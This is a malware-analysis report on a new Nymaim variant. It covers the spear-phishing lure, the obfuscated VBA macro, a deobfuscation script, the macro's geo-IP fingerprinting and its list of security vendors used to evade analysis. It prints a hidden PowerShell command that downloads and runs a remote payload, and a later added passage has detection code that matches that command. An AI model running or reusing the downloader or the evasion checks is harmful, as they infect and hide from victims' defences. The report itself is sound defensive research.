Verint’s Cyber Research team has discovered an unknown variant of the Nymaim malware family, a group of threats that are also capable of downloading various malicious payloads onto the affected device, ranging from Ransomware to Banking Trojans.
Nymaim is a malware family that was prevalent in 2013 but has recently reemerged on the threat landscape. In the past, it seems the vast majority of attacks were associated with file-encoding malware as the final payload, but we must stress that Nymaim serves as a method of delivering multiple types of malicious payload.
As mentioned above, having first appeared in 2013, Nymaim’s popularity dropped significantly in the years that followed. However, there has been a significant increase in the number of attacks seen over the past 6 months (specifically, a 63% increase in attacks compared to 2015).
What does the new variant bring to the table?
As can only be expected in the current cyber landscape, the new variant of Nymaim possesses an arsenal of new features and capabilities that have not yet been seen, including new delivery mechanisms, obfuscation methods, PowerShell usage and even an interesting form of “anti-security solution/analysis” blacklisting. These are described in detail further on in the report.
Unlike the 2013 version, which was distributed via drive-by-downloads as the victims visited compromised websites, the new reincarnation has been shown to use a different vector of attack. Spear phishing campaigns, with emails containing a malicious Microsoft Word .DOC file as an attachment, are used to socially engineer victims into initiating the infection. Our analysis of the newest variant also matches this trend.
While perhaps not the most alarming finding Verint’s research team has ever seen, this Nymaim variant serves as substantial evidence of two significant trends:
- The reemergence and evolution of the Nymaim family. Our discovery shows that not only is the malware family definitely back in action, it has gone through dramatic changes, meaning that it deserves renewed attention.
- This is another perfect example of how even relatively widespread threats are employing significantly more advanced methods of attack, distribution and obfuscation that, not long ago, would have been found only in the most advanced and targeted threats. This trend is only getting stronger and means that “advanced” threats will continue to affect a wider range of victims than ever before.
Alongside significantly deeper analysis into the malware’s payloads, we will continue to monitor the progression and spreading of the malware itself and will naturally publish any additional significant findings.
Breaking down the discovery
As mentioned above, recent reports show that Nymaim is mainly distributed via spear phishing campaigns which target high-level managers. Our analyzed sample fits this modus operandi, as can be seen in the following example. The email message includes the recipient’s job title in the subject line (“Vice President – Human Resources”), while the body of the message includes such details as the recipient’s full name and office address. The subject discussed in the email seems relevant to HR personnel.
Figure 1: email with subject: Vice President – Human Resources [recipient name] Draft documents endorsed for your review [Random digits]
Carefully examining the email, we see that although it was received from Brian Grimes, a reply to the email will be redirected to firstname.lastname@example.org.
When opening the attachment, it looks like a classic phishing attempt, which tries to convince the user to enable macros because the document is ‘protected’:
Figure 2: Example attachment
Analyzing the document’s streams reveals its structure. It contains macro code in stream A3, as follows:
Figure 3: oledump structure of the attachment
Extracting the VBA macro code from the document indicates that the code is obfuscated, as can be seen from the following excerpt:
Figure 4: obfuscated VBA macro downloader excerpt
Macro code, obfuscation changes
What initially caught our attention was the Macro payload. Previous articles on Nymaim’s obfuscation technique described a ROT obfuscation mechanism, but what we had on our hands was different: no ROT shift gave us sensible strings, so we went on to deobfuscate the fairly short Macro code to reveal its gems.
In effect, obfuscation is done through two tactics: one obfuscates strings in particular, the other makes the Macro methods virtually unreadable and cumbersome for the reverse engineer.
String de-obfuscation is implemented by calculating a cyclic sequence of indices that yields the correct reordering of the string. The key for the character reordering consists of two numbers (the starting offset and the step size used in the script below). De-obfuscation of strings can be performed using the following script:
```python
# The cutter function slices a single, selected character out of the original obfuscated string
def cutter(tstring, int1):
    pstring = tstring[int1:(int1 + 1)]
    return pstring

# Compute the index of the next-in-cycle character (int1 reduced modulo the string length)
def fremainder(int1, length):
    intn = (int1 - (length * (int1 // length)))
    return intn

# Deobfuscate the string: start at index int1 mod len and advance by int2 each step
def decrypt(int1, int2, tstring):
    decrypted = ""
    fremainder_int = fremainder(int1, len(tstring))
    while len(decrypted) < len(tstring):
        decrypted = decrypted + cutter(tstring, fremainder_int)
        fremainder_int = fremainder((int2 + fremainder_int), len(tstring))
    return decrypted

if __name__ == "__main__":
    # exemplified with decrypt(127, 271, ".h2cwm/d/yii:iexp//mt.owev.w/pn/tomscgat1m")
    num1 = 127
    num2 = 271
    obfstring = ".h2cwm/d/yii:iexp//mt.owev.w/pn/tomscgat1m"
    print(decrypt(num1, num2, obfstring))
```
A major modification within the downloader’s methods is the order of execution and the implementation of the first-stage drop. First, it launches a PowerShell routine to download and run a first-stage payload:
```powershell
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)
```
Another pre-execution stage is a very common maneuver: testing for connectivity and providing the C&C with the external-facing IP address of the target.
The macro crafts a GET request to “https://www.maxmind.com/geoip/v2.1/city/me”, using a Referer value of “https://www.maxmind.com/en/locate-my-ip-address” and a User-Agent value of “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)”.
The User-Agent used here is the one introduced with the Internet Explorer 10 platform preview (2011), a somewhat peculiar choice for an up-to-date variant that may point to the origin of the mechanism’s code.
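As an added example (not code from the report or from the Verint team), the detection logic below scans constructed process-creation events and proxy log lines for the two pre-execution behaviours described above: Office-spawned PowerShell that fetches a file into a temp path and executes it through WScript.Shell, and the maxmind geo-IP lookup carrying the IE10 platform-preview User-Agent and the locate-my-ip Referer. The telemetry format, the field names and the placeholder download host are assumptions.

```python
import re
# Constructed sample telemetry (not from the report): two process-creation
# events and two proxy lines in an assumed 'client "url" "referer" "ua"' form.
SAMPLE_PROCESS_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
                "$f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient)"
                ".DownloadFile('http://placeholder.invalid/worddata.dat', $f);"
                "(New-Object -com WScript.Shell).Exec($f)"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]
SAMPLE_PROXY_LINES = [
    '10.0.0.5 "https://www.maxmind.com/geoip/v2.1/city/me" '
    '"https://www.maxmind.com/en/locate-my-ip-address" '
    '"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"',
    '10.0.0.7 "https://www.maxmind.com/en/home" "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/60.0"',
]

# Tokens of the report's first-stage routine: temp file, WebClient download,
# execution through WScript.Shell. All three under an Office parent is the signal.
DOWNLOADER_TOKENS = ("gettempfilename", "downloadfile", "wscript.shell")
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

def is_office_powershell_downloader(event):
    cmd = event["cmdline"].lower()
    return (event["parent"].upper() in OFFICE_PARENTS
            and event["image"].lower() == "powershell.exe"
            and all(tok in cmd for tok in DOWNLOADER_TOKENS))

PROXY_RE = re.compile(r'^(\S+) "([^"]*)" "([^"]*)" "([^"]*)"$')
GEOIP_URL = "https://www.maxmind.com/geoip/v2.1/city/me"
GEOIP_REFERER = "https://www.maxmind.com/en/locate-my-ip-address"
IE10_PREVIEW_UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"

def is_geoip_fingerprint_beacon(line):
    """Flag the 'city/me' lookup only with the stale IE10 preview UA and the Referer."""
    m = PROXY_RE.match(line)
    if not m:
        return False
    _client, url, referer, ua = m.groups()
    return url == GEOIP_URL and referer == GEOIP_REFERER and ua == IE10_PREVIEW_UA

def scan(events, proxy_lines):
    """Return the command lines and proxy lines that match either behaviour."""
    hits = [e["cmdline"] for e in events if is_office_powershell_downloader(e)]
    hits += [ln for ln in proxy_lines if is_geoip_fingerprint_beacon(ln)]
    return hits
```

Matching on the full triple (URL, Referer, User-Agent) rather than the maxmind host alone keeps legitimate visits to the geo-IP page out of the alert.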
Blacklisting to prevent detection/prevention by Cyber-Security tools
Next, it reads the response to the maxmind.com query and looks for possible blockers/analysis tools by comparing it against an array of strings of interest:
“FORTINET”, “CISCO”, “TREND MICRO”, “RACKSPACE”, “HOSTING”, “STRONG TECHNOLOGIES”, “DATA CENTER”, “IRON PORT”, “BLUECOAT”, “BLUE COAT”, “VMVAULT”, “MESSAGELABS”, “MICROSOFT”, “MIMECAST”, “LEASEWEB”, “BLACKOAKCOMPUTERS”, “ESET, SPOL”, “SERVER”, “DATACENTER”, “BITDEFENDER”, “DATACENTRE”, “OVH SAS”, “NFORCE”, “TRENDMICRO”, “ANONYMOUS”, “CLOUD”, “AMAZON”, “HISPEED.CH”, “HOSTED”, “IRONPORT”, “PALO ALTO”, “PROOFPOINT”, “SECURITY”, “TRUSTWAVE”, “FORCEPOINT”, “DEDICATED”, “HETZNER”, “FIREEYE”, “ZSCALER”
This is an out-of-the-box anti-analysis measure, applied as a pre-emptive check before downloading the first-stage payload. That is to say, if any of these sub-strings is found within the response, the macro never reaches the function that downloads the first-stage payload from ‘silkflowersdecordesign.com’.